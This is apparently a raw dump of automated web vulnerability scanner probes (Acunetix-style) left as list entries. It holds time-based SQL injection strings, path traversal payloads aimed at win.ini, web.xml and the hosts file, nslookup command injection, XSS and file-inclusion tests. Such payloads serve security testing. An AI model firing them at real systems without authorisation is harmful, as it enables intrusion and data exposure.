• 10000124+9999472
  • 0XOR(if(now()=sysdate(),sleep(3),0))XORZ
  • esi:include src=http://testasp.vulnweb.com/rpb.png/
  • 0XOR(if(now()=sysdate(),sleep(3),0))XORZ
  • WEBINF\web.xml
  • if(now()=sysdate(),sleep(3),0)
  • WEBINF/web.xml
  • gS2XfMD7))select pg_sleep(9)
  • uWdFLHzd)select pg_sleep(9)
  • eO2Z7juyselect pg_sleep(9)
  • 1))select pg_sleep(9)
  • 1)select pg_sleep(9)
  • ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • 1select pg_sleep(6)
  • ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • nRTvlcVJ)) waitfor delay 0:0:6
  • /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  • 5LT5zPss) waitfor delay 0:0:6
  • ..\..\..\..\..\..\..\..\windows\win.ini
  • BwoeEOMP waitfor delay 0:0:6
  • ................windowswin.ini
  • 1 waitfor delay 0:0:6
  • ????????????????????????????????????????????????windows??win.ini
  • 1)) waitfor delay 0:0:3
  • ../../../../../../../../../../windows/win.ini
  • 1) waitfor delay 0:0:3
  • C:\WINDOWS\system32\drivers\etc\hosts
  • 1 waitfor delay 0:0:3
  • ../../../../../../../../../../windows/win.ini
  • 1 OR 2+4084081=0+0+0+1
  • esxNHQGV
  • 1 OR 2+7557551=0+0+0+1 or UttJroG0=
  • &nslookup 4tMQCPfS&\`0&nslookup 4tMQCPfS&`
  • 1 OR 2+5535531=0+0+0+1
  • (nslookup ceq7Qn2G)
  • 1 OR 2+2132131=0+0+0+1
  • set|set&set
  • 1 OR 2+2592591=0+0+0+1
  • 5ILQttf2
  • 1
  • 1
  • 19600264
  • ()&acxScRiPt K4N0(9019)/ScRiPt
  • 1()&acxScRiPt K4N0(9766)/ScRiPt
  • ??
  • ??
  • JyI=
  • 19334225
  • aMzwD
  • ()&acxScRiPt OyW3(9927)/ScRiPt
  • !
  • 1
  • 1()&acxScRiPt OyW3(9298)/ScRiPt
  • \
  • /www.vulnweb.com
  • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • (select(0)from(select(sleep(6)))v)/+(select(0)from(select(sleep(6)))v)++(select(0)from(select(sleep(6)))v)+/
  • 1
  • 0XOR(if(now()=sysdate(),sleep(6),0))XORZ
  • action/.
  • 0XOR(if(now()=sysdate(),sleep(6),0))XORZ
  • action
  • http://hit1VNNS3ObYN.bxss.me/
  • if(now()=sysdate(),sleep(3),0)
  • action
  • print(md5(acunetix_wvs_security_test))\
  • OUvahWyC))select pg_sleep(3)
  • testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))
  • Bs2AGUvM)select pg_sleep(3)
  • HttP://testasp.vulnweb.com/t/xss.html?00
  • print(md5(acunetix_wvs_security_test))a=
  • Mpwpz4Spselect pg_sleep(9)
  • ^(!)(()))
  • print(md5(acunetix_wvs_security_test))a=
  • 1))select pg_sleep(9)
  • !(()&&!|||
  • print(md5(acunetix_wvs_security_test))
  • 1)select pg_sleep(9)
  • )
  • &n963406=v985197
  • 1select pg_sleep(6)
  • FLnX9UXG)) waitfor delay 0:0:6
  • WEBINF\web.xml
  • testasp.vulnweb.com
  • pFfd1d0Z) waitfor delay 0:0:6
  • WEBINF/web.xml
  • http://testasp.vulnweb.com/t/fit.txt?.jpg
  • RjAhlT6l waitfor delay 0:0:3
  • Http://testasp.vulnweb.com/t/fit.txt
  • 1 waitfor delay 0:0:3
  • 1some_inexistent_file_with_long_name
  • 1)) waitfor delay 0:0:3
  • ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  • http://someinexistentwebsite.acu/some_inexistent_file_with_long_name?.jpg
  • 1) waitfor delay 0:0:3
  • ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  • 10000247+10000395
  • 1 waitfor delay 0:0:3